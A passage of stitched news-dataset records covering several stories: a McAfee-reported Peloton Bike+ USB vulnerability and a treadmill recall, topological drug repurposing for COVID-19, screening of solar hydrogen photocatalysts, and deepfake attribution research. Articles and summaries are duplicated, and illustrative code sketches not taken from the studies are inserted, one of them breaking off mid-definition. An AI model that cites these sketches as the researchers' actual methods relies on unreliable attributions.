recalled its Tread+ and Tread treadmills early last month, citing safety concerns that arose after numerous people were injured and a child died. The Consumer Product Safety Commission, or CPSC, had urged parents to stop using the Tread+ in an "urgent warning" it issued April 17. "CPSC staff believes the Peloton Tread+ poses serious risks to children for abrasions, fractures, and death," a CPSC statement read. "In light of multiple reports of children becoming entrapped, pinned, and pulled under the rear roller of the product, CPSC urges consumers with children at home to stop using the product immediately." Peloton initially rebuked the CPSC's statement, saying its advice to all parents was "inaccurate and misleading." The company later apologized for not having immediately followed the agency's advice. After the recall of nearly 125,000 treadmills on May 5, Peloton updated its software to require users to enter a code to restart the belt if it has been left unmoving for up to 45 seconds.
Researchers at software security company McAfee discovered a vulnerability in the Peloton Bike+ that could enable attackers to install malware in the system through a USB port. The flaw, which the researchers said was associated with the Android attachment accompanying the Bike+, could allow attackers to access its webcam and spy on riders and their surroundings. It also could allow them to install fake versions of popular apps like Netflix and Spotify, and capture riders' personal information. McAfee's Steve Povolny said, "The flaw was that Peloton actually failed to validate that the operating system loaded. And ultimately what that means then is they can install malicious software, they can create Trojan horses and give themselves back doors into the bike, and even access the webcam." Peloton confirmed it was working with McAfee to fix the issue, adding that it recently pushed a mandatory update to affected devices to address the vulnerability.
[]
[]
[]
scitechnews
None
None
None
None
Researchers at software security company McAfee discovered a vulnerability in the Peloton Bike+ that could enable attackers to install malware in the system through a USB port. The flaw, which the researchers said was associated with the Android attachment accompanying the Bike+, could allow attackers to access its webcam and spy on riders and their surroundings. It also could allow them to install fake versions of popular apps like Netflix and Spotify, and capture riders' personal information. McAfee's Steve Povolny said, "The flaw was that Peloton actually failed to validate that the operating system loaded. And ultimately what that means then is they can install malicious software, they can create Trojan horses and give themselves back doors into the bike, and even access the webcam." Peloton confirmed it was working with McAfee to fix the issue, adding that it recently pushed a mandatory update to affected devices to address the vulnerability. Software security company McAfee said it exposed a vulnerability in the Peloton Bike+ that allowed attackers to install malware through a USB port and potentially spy on riders. The Advanced Threat Research Team at McAfee said the problem stemmed from the Android attachment that accompanies the Peloton stationary exercise Bike+. McAfee said attackers could access the bike through the port and install fake versions of popular apps like Netflix and Spotify, which could then fool users into entering their personal information. A Peloton Bike+ in a public, shared place, such as a hotel or a gym, would be especially vulnerable to the attack. "The flaw was that Peloton actually failed to validate that the operating system loaded," said Steve Povolny, head of the threat research team. "And ultimately what that means then is they can install malicious software, they can create Trojan horses and give themselves back doors into the bike, and even access the webcam." Povolny said there are "interactive maps" online showing Peloton bikes and treadmills in the U.S., which can give attackers an easy way to find those in public spaces and eventually access users' accounts. Hackers could then upload a "completely customized malicious image" that would eventually grant them access to a rider's microphone, camera and apps, he said. "Not only could you spy on riders but, maybe more importantly, their surroundings, sensitive information," Povolny said. Peloton confirmed in a statement that engineers from McAfee alerted them to the problem "via our Coordinated Vulnerability Disclosure program" and said they were working with the security company to fix the issue. McAfee said it disclosed the vulnerability to Peloton about three months ago and heard back from the company within a couple of weeks. "McAfee reported a vulnerability to us that required direct, physical access to a Peloton Bike+ or Tread to exploit the issue," the exercise equipment company said in a statement. "Peloton also pushed a mandatory update to affected devices last week that addressed this vulnerability." Experts say any device that connects to the internet - like a TV, an appliance or even a toy - could be a way for hackers to get your personal data. Cybersecurity experts say you should turn on automatic software updates and consider security software for your home network. Peloton recalled its Tread+ and Tread treadmills early last month, citing safety concerns that arose after numerous people were injured and a child died. 
The Consumer Product Safety Commission, or CPSC, had urged parents to stop using the Tread+ in an "urgent warning" it issued April 17. "CPSC staff believes the Peloton Tread+ poses serious risks to children for abrasions, fractures, and death," a CPSC statement read. "In light of multiple reports of children becoming entrapped, pinned, and pulled under the rear roller of the product, CPSC urges consumers with children at home to stop using the product immediately." Peloton initially rebuked the CPSC's statement, saying its advice to all parents was "inaccurate and misleading." The company later apologized for not having immediately followed the agency's advice. After the recall of nearly 125,000 treadmills on May 5, Peloton updated its software to require users to enter a code to restart the belt if it has been left unmoving for up to 45 seconds.
244
Researchers Identify 16 Medicines That Could Be Used to Treat COVID-19
Medicine repositioning is the quickest way to find treatments for the disease among existing medicines, without waiting to complete the clinical trial phases required to develop a new one. Researchers from the ESI International Chair of the CEU Cardenal Herrera University (CEU UCH) and ESI Group have just published in scientific journal Pharmaceutics a new computational topology strategy to identify existing medicines that could be applied to treat COVID-19 without waiting for the research and clinical trial phases required to develop a new medicine. This mathematical model applies Topologic Data Analysis in a pioneering way in order to compare the three-dimensional structure of the target proteins of known medicines to SARS-CoV-2 coronavirus proteins such as protein NSP12, an enzyme in charge of replicating the viral RNA. According to ESI-CU Chair director Antonio Falcó, "this type of analysis requires comparing a large number of parameters, which is why it is necessary to apply advanced computational techniques such as the ones we develop at the ESI-CEU Chair, which we apply to very diverse fields: from designing new materials, to optimising manufacturing processes. Now we have used our knowledge to tackle the challenge posed by the pandemic, to find known treatments that can be effective to treat COVID-19 as fast as possible by comparing, for the first time, the topological structure of proteins." Innovation in medicine repositioning Even though other research groups have applied computational methods to reposition medicines to treat COVID-19, ESI Chair researcher Joan Climent highlights that "we are the first group on an international level to apply the latest breakthroughs in topologic data analysis (TDA), which is used to study the properties of geometric bodies, to analyse biological geometries in the context of medicine repositioning. Our starting point is the idea that known medicines that act against a certain protein as a therapeutic target can also act against other proteins that have a three-dimensional structure with a high degree of topological similarity." In the case of COVID-19, it is known that protein NSP12, an RNA polymerase that depends on RNA and is in charge of the viral RNA replicating in the host cells, is one of the most interesting and promising pharmacological targets. "Medicines that are effective against proteins with a three-dimensional topological structure that is highly similar to the NSP12 protein of SARS-CoV-2 could also be effective against this protein." Sixteen medicines of 1,825 analysed The study of the ESI-CEU Chair, published in Pharmaceutics, looked at the 1,825 medicines approved by the FDA, the American Food and Drug Administration. According to the Drug Bank repository, these medicines are connected to 27,830 protein structures. In the first phase of this mass analysis, the researchers compared the topological structure of these thousands of proteins available in the Protein Data Bank with the 23 proteins of the SARS-CoV-2 coronavirus. There turned out to be three viral proteins with highly significant topological similarities to target protein structures of known medicines: viral protease 3CL, endoribonuclease NSP15 and RNA-dependent RNA polymerase NSP12. With this methodology, among the 1,825 medicines approved by the FDA, the research team was able to identify 16 medicines that act against these three proteins as their therapeutic target. 
Among these 16 medicines are rutin, a flavonoid that inhibits platelet aggregation; dexamethasone, a glucocorticoid that acts as an anti-inflammatory and immunosuppressor; and vemurafenib, a kinase inhibitor suited for adult patients with melanoma. With these medicines identified, they will now have to be subjected to in vitro and in vivo clinical studies to confirm the possible efficacy detected by the mathematical model and to determine the best combination of them to treat the symptoms caused by COVID-19. Dexamethasone is currently one of the most widely used and most successful medicines for treating advanced COVID-19 disease. New variant and future pandemics The authors of the study, all ESI-CEU Chair researchers, also highlight the future usefulness of this new strategy to reposition medicines: "If we consider that half of these new virus variants have modified genes that code the Spike protein, this technique can be useful to reposition new medicines depending on the changes of the protein structure in the new variants. Furthermore, this strategy could be applied both to the SARS-CoV-2 coronavirus and its new variants, as well as to any new viruses that may appear in the future, identifying their proteins and comparing their topological structure to that of the target proteins in known medicines, using this same strategy." The researchers who performed this study are, together with Chair director Antonio Falcó Montesinos and Joan Climent Bataller, from the Department of Animal Production and Health of the CEU UCH, Raúl Pérez Moraga, Jaume Forés Martos and Beatriz Suay García, from the Department of Mathematics, Physics and Computing Sciences of the CEU UCH, and Jean Louis Duval, from the French multinational company ESI Group, partner of the CEU UCH in the ESI-CEU international Chair. Article: Pérez-Moraga, R.; Forés-Martos, J.; Suay-García, B.; Duval, J.-L.; Falcó, A.; Climent, J. A COVID-19 Drug Repurposing Strategy through Quantitative Homological Similarities Using a Topological Data Analysis-Based Framework. Pharmaceutics 2021, 13, 488. DOI: https://doi.org/10.3390/pharmaceutics13040488
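A minimal sketch of the core idea -- scoring how topologically similar two 3-D structures are -- is shown below, assuming the ripser and persim Python packages are installed. Random point clouds stand in for protein atomic coordinates; the paper's actual pipeline and similarity measure are more elaborate.

```python
# Hedged sketch of topological comparison of two 3-D structures. The point clouds are
# random placeholders, not real protein coordinates from the study.
import numpy as np
from ripser import ripser
from persim import bottleneck

rng = np.random.default_rng(1)
protein_a = rng.normal(size=(60, 3))  # stand-in for one protein's atom coordinates
protein_b = rng.normal(size=(60, 3))  # stand-in for a candidate target protein

dgm_a = ripser(protein_a, maxdim=1)["dgms"][1]  # 1-dimensional persistence diagram
dgm_b = ripser(protein_b, maxdim=1)["dgms"][1]

# A small bottleneck distance means the two shapes are topologically similar.
print("bottleneck distance:", bottleneck(dgm_a, dgm_b))
```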
Researchers from the ESI International Chair of the CEU Cardenal Herrera University and ESI Group used a new computational topology strategy to determine which existing medicines could be used to treat COVID-19. The model uses topologic data analysis to compare the three-dimensional structure of the target proteins of known medicines to SARS-CoV-2 coronavirus proteins, such as protein NSP12. The researchers studied 1,825 medicines approved by the U.S. Food and Drug Administration, which are connected to 27,830 protein structures. In comparing the topological structure of the proteins available in the Protein Data Bank with the 23 proteins of the SARS-CoV-2 coronavirus, they identified 16 medicines that act against the three viral proteins found to have highly significant topological similarities to target protein structures of the known medicines. These drugs can now be studied to determine the most effective combination of them to treat COVID-19 symptoms.
[]
[]
[]
scitechnews
None
None
None
None
Researchers from the ESI International Chair of the CEU Cardenal Herrera University and ESI Group used a new computational topology strategy to determine which existing medicines could be used to treat COVID-19. The model uses topologic data analysis to compare the three-dimensional structure of the target proteins of known medicines to SARS-CoV-2 coronavirus proteins, such as protein NSP12. The researchers studied 1,825 medicines approved by the U.S. Food and Drug Administration, which are connected to 27,830 protein structures. In comparing the topological structure of the proteins available in the Protein Data Bank with the 23 proteins of the SARS-CoV-2 coronavirus, they identified 16 medicines that act against the three viral proteins found to have highly significant topological similarities to target protein structures of the known medicines. These drugs can now be studied to determine the most effective combination of them to treat COVID-19 symptoms. Medicine repositioning is the quickest way to find treatments for the disease among existing medicines, without waiting to complete the clinical trial phases required to develop a new one. Researchers from the ESI International Chair of the CEU Cardenal Herrera University (CEU UCH) and ESI Group have just published in scientific journal Pharmaceutics a new computational topology strategy to identify existing medicines that could be applied to treat COVID-19 without waiting for the research and clinical trial phases required to develop a new medicine. This mathematical model applies Topologic Data Analysis in a pioneering way in order to compare the three-dimensional structure of the target proteins of known medicines to SARS-CoV-2 coronavirus proteins such as protein NSP12, an enzyme in charge of replicating the viral RNA. According to ESI-CU Chair director Antonio Falcó, "this type of analysis requires comparing a large number of parameters, which is why it is necessary to apply advanced computational techniques such as the ones we develop at the ESI-CEU Chair, which we apply to very diverse fields: from designing new materials, to optimising manufacturing processes. Now we have used our knowledge to tackle the challenge posed by the pandemic, to find known treatments that can be effective to treat COVID-19 as fast as possible by comparing, for the first time, the topological structure of proteins." Innovation in medicine repositioning Even though other research groups have applied computational methods to reposition medicines to treat COVID-19, ESI Chair researcher Joan Climent highlights that "we are the first group on an international level to apply the latest breakthroughs in topologic data analysis (TDA), which is used to study the properties of geometric bodies, to analyse biological geometries in the context of medicine repositioning. Our starting point is the idea that known medicines that act against a certain protein as a therapeutic target can also act against other proteins that have a three-dimensional structure with a high degree of topological similarity." In the case of COVID-19, it is known that protein NSP12, an RNA polymerase that depends on RNA and is in charge of the viral RNA replicating in the host cells, is one of the most interesting and promising pharmacological targets. "Medicines that are effective against proteins with a three-dimensional topological structure that is highly similar to the NSP12 protein of SARS-CoV-2 could also be effective against this protein." 
Sixteen medicines of 1,825 analysed The study of the ESI-CEU Chair, published in Pharmaceutics, looked at the 1,825 medicines approved by the FDA, the American Food and Drug Administration. According to the Drug Bank repository, these medicines are connected to 27,830 protein structures. In the first phase of this mass analysis, the researchers compared the topological structure of these thousands of proteins available in the Protein Data Bank with the 23 proteins of the SARS-CoV-2 coronavirus. There turned out to be three viral proteins with highly significant topological similarities to target protein structures of known medicines: viral protease 3CL, endoribonuclease NSP15 and RNA-dependent RNA polymerase NSP12. With this methodology, among the 1,825 medicines approved by the FDA, the research team was able to identify 16 medicines that act against these three proteins as their therapeutic target. Among these 16 medicines are rutin, a flavonoid that inhibits platelet aggregation; dexamethasone, a glucocorticoid that acts as an anti-inflammatory and immunosuppressor; and vemurafenib, a kinase inhibitor suited for adult patients with melanoma. With these medicines now identified, they will now have to be subjected to in vitro and in vivo clinical studies to confirm the possible efficiency detected by the mathematical model and to determine the best combination of them to treat the symptoms caused by COVID-19. Dexamethasone is currently one of the most used medicines that has the most success treating advanced COVID-19 disease. New variant and future pandemics The authors of the study, all ESI-CEU Chair researchers, also highlight the future usefulness of this new strategy to reposition medicines: "If we consider that half of these new virus variants have modified genes that code the Spike protein, this technique can be useful to reposition new medicines depending on the changes of the protein structure in the new variants. Furthermore, this strategy could be applied both to the SARS-CoV-2 coronavirus and its new variants, as well as to any new viruses that may appear in the future, identifying their proteins and comparing their topological structure to that of the target proteins in known medicines, using this same strategy. The researchers who performed this study are, together with Chair director Antonio Falcó Montesinos, and Joan Climent Bataller, from the Department of Animal Production and Health of the CEU UCH, Raúl Pérez Moraga, Jaume Forés Martos and Beatriz Suay García, from the Department of Mathematics, Physics and Computing Sciences of the CEU UCH, and Jean Louis Duval, from the French multinational company ESI Group, partner of the CEU UCH in the ESI-CEU international Chair. Article Pérez-Moraga, R.; Forés-Martos, J.; Suay-García, B.; Duval, J.-L.; Falcó, A.; Climent, J. A COVID-19 Drug Repurposing Strategy through Quantitative Homological Similarities Using a Topological Data Analysis-Based Framework. Pharmaceutics 2021 , 13 , 488. DOI: https://doi.org/10.3390/ pharmaceutics13040488
245
Computers Help Researchers Find Materials to Turn Solar Power into Hydrogen
UNIVERSITY PARK, Pa. -- Using solar energy to inexpensively harvest hydrogen from water could help replace carbon-based fuel sources and shrink the world's carbon footprint. However, finding materials that could boost hydrogen production so that it could compete economically with carbon-based fuels has been, as yet, an insurmountable challenge. In a study, a Penn State-led team of researchers reports it has taken a step toward overcoming the challenge of inexpensive hydrogen production by using supercomputers to find materials that could help accelerate hydrogen separation when water is exposed to light, a process called photocatalysis. Both electricity and solar energy can be used to separate hydrogen from water, which is made up of two hydrogen atoms and an oxygen atom, according to Ismaila Dabo, associate professor of materials science and engineering, Institute for Computational and Data Sciences (ICDS) affiliate, and co-funded faculty member of the Institutes of Energy and the Environment. Using sunlight to generate electricity that then creates hydrogen through electrolysis -- hydrogen which, in turn, would likely be converted back into electricity -- may not be technically advantageous or economically effective. While using solar energy directly to produce hydrogen from water -- or photocatalysis -- avoids that extra step, researchers have yet to be able to use direct solar hydrogen conversion in a way that would compete with carbon-based fuels, such as gasoline. The researchers, who report their findings in Energy and Environmental Science, used a type of computational approach called high-throughput materials screening to narrow a list of more than 70,000 different compounds down to six promising candidates for those photocatalysts, which, when added to water, can enable the solar hydrogen production process, said Dabo. They examined the compounds listed in the Materials Project database, an online open-access repository of known and predicted materials. The team developed an algorithm to identify materials with properties that would make them suitable photocatalysts for the hydrogen production process. For example, the researchers investigated the ideal energy range -- or the band gap -- for the materials to absorb sunlight. Working closely with Héctor Abruña, professor of chemistry at Cornell; Venkatraman Gopalan, professor of materials science and engineering at Penn State; and Raymond Schaak, professor of chemistry at Penn State, they also looked at materials that could effectively dissociate water, as well as materials that offered good chemical stability. "We believe the integrated computational-experimental workflow that we have developed can considerably accelerate the discovery of efficient photocatalysts," said Yihuang Xiong, graduate research assistant and co-first author of the paper. "We hope that, by doing so, we will be able to reduce the cost of hydrogen production." Dabo added the team focused on oxides -- chemical compounds made up of at least one oxygen atom -- because they can be synthesized in a reasonable amount of time using standard processes. The work required collaborations from across disciplines, which served as a learning experience for the research team. "I found it very rewarding to have worked on such a collaborative project," said Nicole Kirchner-Hall, doctoral student and co-author of the paper. 
"As a graduate student specializing in computational material science, I was able to predict possible photocatalytic materials using calculations and work with experimental collaborators here at Penn State and other institutions to co-validate our computational predictions." Other researchers have previously conducted an economic analysis on several options of using solar energy to produce electricity and determined that solar could drop the price of hydrogen production to compete with gasoline, said Dabo. "Their essential conclusion was that if you were able to develop this technology, you could produce hydrogen at the cost of $1.60 to $3.20 per equivalent gallon of gasoline," said Dabo. "So, compare that to gasoline, which is around $3 a gallon, if this works, you could pay as low as $1.60 for about the same amount of energy as a gallon of gas in the ideal case scenario." He added that if a catalyst can help boost solar hydrogen production, this could lead to a hydrogen price that is competitive with gasoline. The team relied on Penn State ICDS's Roar supercomputer for the computations. According to Dabo, computers represent an important tool in speeding up the process to find the right materials to be used in specific processes. This computationally driven, data-intensive method could represent a revolution in efficiency over the painstaking trial-and-error approach. "When Thomas Edison wanted to find materials for the light bulb, he looked at just about every material under the sun until he found the right material for the light bulb," said Dabo. "Here we're trying to do the same thing, but in a way to use computers to accelerate that process." He added that computers will not replace experimentation. "Computers can make the recommendations as to what materials will be the most promising and then you still need to do the experimental study," said Dabo. Dabo said he expects the power of computers will streamline the process of finding the best candidates and dramatically cut the time it takes to design materials in the lab to bring them to market to address needs. The researchers evaluated machine learning algorithms to make suggestions for chemicals that could be synthesized and used as catalysts in solar hydrogen production. Based on this preliminary investigation, they suggest future work may focus on developing machine learning models to improve the chemical screening process. Dabo also added that they may look at chemical compounds outside of oxides to determine if they might serve as catalysts for solar hydrogen production. "So far, we did one cycle of this process on oxides -- essentially rusted metals -- but there are a lot of compounds that could be made that aren't based on oxygen," said Dabo. "For example, there are compounds based on nitrogen or sulfur, that we could explore." The National Science Foundation (NSF) and the HydroGEN Advanced Water Splitting Materials Consortium of the U.S. Department of Energy (DOE) supported this work. The team also included Quinn T. Campbell, postdoctoral scholar at Sandia National Laboratories; Julian Fanghanel, graduate student in materials science and engineering at Penn State; Catherine K. Badding, undergraduate student in chemistry at Cornell and DOE Science Undergraduate Laboratory Internship Fellow (now graduate student at MIT); Huaiyu Wang, graduate student in materials science and engineering at Penn State; Monica J. 
Theibault, graduate student in chemistry at Cornell; Iurii Timrov, postdoctoral scholar at École Polytechnique Fédérale de Lausanne, Switzerland; Jared S. Mondschein, graduate student in chemistry at Penn State; Kriti Seth, graduate student in chemistry at Penn State; Rebecca Katz, graduate student in chemistry at Penn State; Andrés Molina Villarino, graduate student in chemistry at Cornell; Betül Pamuk, postdoctoral scholar in physics at Cornell; Megan E. Penrod, undergraduate student in materials science and engineering at Penn State (now graduate student at University of Florida); Mohammed M. Khan, undergraduate student in materials science and engineering at Penn State (now graduate student at KAUST); Tiffany Rivera, NSF Research Experiences for Undergraduates Fellow; Nathan C. Smith, NSF Research Experiences for Undergraduates Fellow; Xavier Quintana, NSF Research Experiences for Undergraduates Fellow; Paul Orbe, NSF Research Experiences for Teachers Fellow; Craig J. Fennie, professor of physics at Cornell; Senorpe Asem-Hiablie, courtesy assistant research professor at the Penn State Institutes of Energy and the Environment; James L. Young, researcher at the National Renewable Energy Laboratory; Todd G. Deutsch, researcher at the National Renewable Energy Laboratory; and Matteo Cococcioni, professor of physics at University of Pavia, Italy.
A team led by Pennsylvania State University (Penn State) researchers has shown how supercomputers can identify materials that could help separate hydrogen from water using solar energy. The researchers developed an algorithm to identify materials in the online open access Materials Project database that have the properties of suitable photocatalysts, which can enable the solar hydrogen production process when added to water. They examined such things as the band gap, or the ideal energy range for the materials to absorb sunlight, as well as which materials can dissociate water effectively and which have good chemical stability. Penn State's Yihuang Xiong said, "We believe the integrated computational-experimental workflow that we have developed can considerably accelerate the discovery of efficient photocatalysts."
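Neither the article nor the summary shows what such a screening filter looks like in code. The sketch below is a minimal, self-contained illustration of the general idea -- keep only candidates whose band gap, band-edge positions, and stability pass simple thresholds. The candidate records, field names, and numerical cut-offs are illustrative assumptions, not values from the published workflow, which queried the Materials Project and ran first-principles calculations on the Roar supercomputer.

```python
# Minimal, hypothetical sketch of a high-throughput screen for water-splitting
# photocatalysts. Thresholds and candidate data are assumed for illustration.
from dataclasses import dataclass

# Approximate water redox levels in eV relative to the vacuum level (pH 0).
H2_EVOLUTION = -4.44   # H+/H2
O2_EVOLUTION = -5.67   # O2/H2O (1.23 eV below the H+/H2 level)

@dataclass
class Candidate:
    formula: str
    band_gap: float               # eV
    conduction_band_edge: float   # eV vs. vacuum
    valence_band_edge: float      # eV vs. vacuum
    energy_above_hull: float      # eV/atom, a proxy for thermodynamic stability

def is_promising(c: Candidate) -> bool:
    absorbs_visible = 1.6 <= c.band_gap <= 3.0               # assumed window for sunlight absorption
    straddles_water = (c.conduction_band_edge > H2_EVOLUTION  # can drive H2 evolution
                       and c.valence_band_edge < O2_EVOLUTION)  # can drive O2 evolution
    stable = c.energy_above_hull < 0.05                       # close to the convex hull
    return absorbs_visible and straddles_water and stable

candidates = [
    Candidate("HypotheticalOxideA", 2.1, -4.1, -6.2, 0.01),
    Candidate("HypotheticalOxideB", 0.9, -4.6, -5.5, 0.00),
]
print([c.formula for c in candidates if is_promising(c)])  # only OxideA passes
```

The real screen applies criteria of this kind to tens of thousands of database entries, which is why a few simple property filters can cut more than 70,000 compounds down to a short list worth synthesizing.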
[]
[]
[]
scitechnews
None
None
None
None
A team led by Pennsylvania State University (Penn State) researchers has shown how supercomputers can identify materials that could help separate hydrogen from water using solar energy. The researchers developed an algorithm to identify materials in the online open access Materials Project database that have the properties of suitable photocatalysts, which can enable the solar hydrogen production process when added to water. They examined such things as the band gap, or the ideal energy range for the materials to absorb sunlight, as well as which materials can dissociate water effectively and which have good chemical stability. Penn State's Yihuang Xiong said, "We believe the integrated computational-experimental workflow that we have developed can considerably accelerate the discovery of efficient photocatalysts." UNIVERSITY PARK, Pa. -- Using solar energy to inexpensively harvest hydrogen from water could help replace carbon-based fuel sources and shrink the world's carbon footprint. However, finding materials that could boost hydrogen production so that it could compete economically with carbon-based fuels has been, as yet, an insurmountable challenge. In a study, a Penn State-led team of researchers reports it has taken a step toward overcoming the challenge of inexpensive hydrogen production by using supercomputers to find materials that could help accelerate hydrogen separation when water is exposed to light, a process called photocatalysis. Both electricity and solar energy can be used to separate hydrogen from water, which is made up of two hydrogen atoms and an oxygen atom, according to Ismaila Dabo, associate professor of materials science and engineering, Institute for Computational and Data Sciences (ICDS) affiliate, and co-funded faculty member of the Institutes of Energy and the Environment. Using sunlight to generate electricity that then creates hydrogen through electrolysis -- hydrogen which, in turn, would likely be converted back into electricity -- may not be technically advantageous or economically effective. While using solar energy directly to produce hydrogen from water -- or photocatalysis -- avoids that extra step, researchers have yet to be able to use direct solar hydrogen conversion in a way that would compete with carbon-based fuels, such as gasoline. The researchers, who report their findings in Energy and Environmental Science, used a type of computational approach called high-throughput materials screening to narrow a list of more than 70,000 different compounds down to six promising candidates for those photocatalysts, which, when added to water, can enable the solar hydrogen production process, said Dabo. They examined the compounds listed in the Materials Project database, an online open-access repository of known and predicted materials. The team developed an algorithm to identify materials with properties that would make them suitable photocatalysts for the hydrogen production process. For example, the researchers investigated the ideal energy range -- or the band gap -- for the materials to absorb sunlight. Working closely with Héctor Abruña, professor of chemistry at Cornell; Venkatraman Gopalan, professor of materials science and engineering at Penn State; and Raymond Schaak, professor of chemistry at Penn State, they also looked at materials that could effectively dissociate water, as well as materials that offered good chemical stability. 
"We believe the integrated computational-experimental workflow that we have developed can considerably accelerate the discovery of efficient photocatalysts," said Yihuang Xiong, graduate research assistant and co-first author of the paper. "We hope that, by doing so, we will be able to reduce the cost of hydrogen production." Dabo added the team focused on oxides -- chemical compounds made up of at least one oxygen atom -- because they can be synthesized in a reasonable amount of time using standard processes. The work required collaborations from across disciplines, which served as a learning experience for the research team. "I found it very rewarding to have worked on such a collaborative project," said Nicole Kirchner-Hall, doctoral student and co-author of the paper. "As a graduate student specializing in computational material science, I was able to predict possible photocatalytic materials using calculations and work with experimental collaborators here at Penn State and other institutions to co-validate our computational predictions." Other researchers have previously conducted an economic analysis on several options of using solar energy to produce electricity and determined that solar could drop the price of hydrogen production to compete with gasoline, said Dabo. "Their essential conclusion was that if you were able to develop this technology, you could produce hydrogen at the cost of $1.60 to $3.20 per equivalent gallon of gasoline," said Dabo. "So, compare that to gasoline, which is around $3 a gallon, if this works, you could pay as low as $1.60 for about the same amount of energy as a gallon of gas in the ideal case scenario." He added that if a catalyst can help boost solar hydrogen production, this could lead to a hydrogen price that is competitive with gasoline. The team relied on Penn State ICDS's Roar supercomputer for the computations. According to Dabo, computers represent an important tool in speeding up the process to find the right materials to be used in specific processes. This computationally driven, data-intensive method could represent a revolution in efficiency over the painstaking trial-and-error approach. "When Thomas Edison wanted to find materials for the light bulb, he looked at just about every material under the sun until he found the right material for the light bulb," said Dabo. "Here we're trying to do the same thing, but in a way to use computers to accelerate that process." He added that computers will not replace experimentation. "Computers can make the recommendations as to what materials will be the most promising and then you still need to do the experimental study," said Dabo. Dabo said he expects the power of computers will streamline the process of finding the best candidates and dramatically cut the time it takes to design materials in the lab to bring them to market to address needs. The researchers evaluated machine learning algorithms to make suggestions for chemicals that could be synthesized and used as catalysts in solar hydrogen production. Based on this preliminary investigation, they suggest future work may focus on developing machine learning models to improve the chemical screening process. Dabo also added that they may look at chemical compounds outside of oxides to determine if they might serve as catalysts for solar hydrogen production. "So far, we did one cycle of this process on oxides -- essentially rusted metals -- but there are a lot of compounds that could be made that aren't based on oxygen," said Dabo. 
"For example, there are compounds based on nitrogen or sulfur, that we could explore." The National Science Foundation (NSF) and the HydroGEN Advanced Water Splitting Materials Consortium of the U.S. Department of Energy (DOE) supported this work. The team also included Quinn T. Campbell, postdoctoral scholar at Sandia National Laboratories; Julian Fanghanel, graduate student in materials science and engineering at Penn State; Catherine K. Badding, undergraduate student in chemistry at Cornell and DOE Science Undergraduate Laboratory Internship Fellow (now graduate student at MIT); Huaiyu Wang, graduate student in materials science and engineering at Penn State; Monica J. Theibault, graduate student in chemistry at Cornell; Iurii Timrov, postdoctoral scholar at École Polytechnique Fédérale de Lausanne, Switzerland; Jared S. Mondschein, graduate student in chemistry at Penn State; Kriti Seth, graduate student in chemistry at Penn State; Rebecca Katz, graduate student in chemistry at Penn State; Andrés Molina Villarino, graduate student in chemistry at Cornell; Betül Pamuk, postdoctoral scholar in physics at Cornell; Megan E. Penrod, undergraduate student in materials science and engineering at Penn State (now graduate student at University of Florida); Mohammed M. Khan, undergraduate student in materials science and engineering at Penn State (now graduate student at KAUST); Tiffany Rivera, NSF Research Experiences for Undergraduates Fellow; Nathan C. Smith, NSF Research Experiences for Undergraduates Fellow; Xavier Quintana, NSF Research Experiences for Undergraduates Fellow; Paul Orbe, NSF Research Experiences for Teachers Fellow; Craig J. Fennie, professor of physics at Cornell; Senorpe Asem-Hiablie, courtesy assistant research professor at the Penn State Institutes of Energy and the Environment; James L. Young, researcher at the National Renewable Energy Laboratory; Todd G. Deutsch, researcher at the National Renewable Energy Laboratory; and Matteo Cococcioni, professor of physics at University of Pavia, Italy.
246
MSU, Facebook Develop Research Model to Fight Deepfakes
Detecting "deepfakes," or when an existing image or video of a person is manipulated and replaced with someone else's likeness, presents a massive cybersecurity challenge: What could happen when deepfakes are created with malicious intent? Artificial intelligence experts from Michigan State University and Facebook partnered on a new reverse-engineering research method to detect and attribute deepfakes, which gives researchers and practitioners tools to better investigate incidents of coordinated disinformation using deepfakes as well as open new directions for future research. Technological advancements make it nearly impossible to tell whether an image of a person that appears on social media platforms is actually a real human. The MSU-Facebook detection method is the first to go beyond standard-model classification methods. "Our method will facilitate deepfake detection and tracing in real-world settings where the deepfake image itself is often the only information detectors have to work with," said Xiaoming Liu, MSU Foundation Professor of computer science . " It's important to go beyond current methods of image attribution because a deepfake could be created using a generative model that the current detector has not seen during its training." The team's novel framework uses fingerprint estimation to predict network architecture and loss functions of an unknown generative model given a single generated image. The new method, explained in the paper, " Reverse Engineering of Generative Models: Inferring Model Hyperparameters from Generated Images ," was developed by Liu and MSU College of Engineering doctoral candidate Vishal Asnani, and Facebook AI researchers Xi Yin and Tal Hassner. Solving the problem of proliferating deepfakes requires going beyond current methods - which focus on distinguishing a real image versus deepfake image that was generated by a model seen during training - to understand how to extend image attribution beyond the limited set of models present in training. Reverse engineering, while not a new concept in machine learning, is a different way of approaching the problem of deepfakes. Prior work on reverse engineering relies on preexisting knowledge, which limits its effectiveness in real-world cases. "Our reverse engineering method relies on uncovering the unique patterns behind the AI model used to generate a single deepfake image," said Facebook's Hassner. " With model parsing, we can estimate properties of the generative models used to create each deepfake, and even associate multiple deepfakes to the model that possibly produced them. This provides information about each deepfake, even ones where no prior information existed." To test their new approach, the MSU researchers put together a fake image dataset with 100,000 synthetic images generated from 100 publicly available generative models. The research team mimicked real-world scenarios by performing cross-validation to train and evaluate the models on different splits of datasets. A more in-depth explanation of their model can be seen on Facebook's blog . The results showed that the MSU-Facebook approach performs substantially better than the random baselines of previous detection models. "The main idea is to estimate the fingerprint for each image and use it for model parsing," Liu said. "Our framework can not only perform model parsing, but also extend to deepfake detection and image attribution." 
In addition to Facebook AI, this study by MSU is based upon work partially supported by the Defense Advanced Research Projects Agency under Agreement No. HR00112090131.
A new reverse-engineering approach developed by artificial intelligence experts at Michigan State University (MSU) and Facebook aims to identify and attribute "deepfakes." Facebook's Tal Hassner said, "With model parsing, we can estimate properties of the generative models used to create each deepfake, and even associate multiple deepfakes to the model that possibly produced them. This provides information about each deepfake, even ones where no prior information existed." The researchers tested their approach using a dataset of 100,000 synthetic images produced by 100 publicly available generative models, and found that it outperformed the random baselines of previous detection models. MSU's Xiaoming Liu said, "Our framework can not only perform model parsing, but also extend to deepfake detection and image attribution."
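The article outlines the two-stage idea -- estimate a fingerprint from a single image, then "parse" the generative model's hyperparameters from that fingerprint -- without showing the architecture. The PyTorch sketch below is a simplified, hypothetical rendering of that structure; the layer sizes, the number of predicted architecture parameters, and the set of loss-function classes are illustrative assumptions and do not reproduce the networks described in the MSU-Facebook paper.

```python
# Simplified, hypothetical sketch of fingerprint estimation followed by model
# parsing (predicting generative-model hyperparameters from a single image).
import torch
import torch.nn as nn

class FingerprintEstimator(nn.Module):
    """Predicts a fingerprint (a subtle residual pattern) the same size as the input image."""
    def __init__(self):
        super().__init__()
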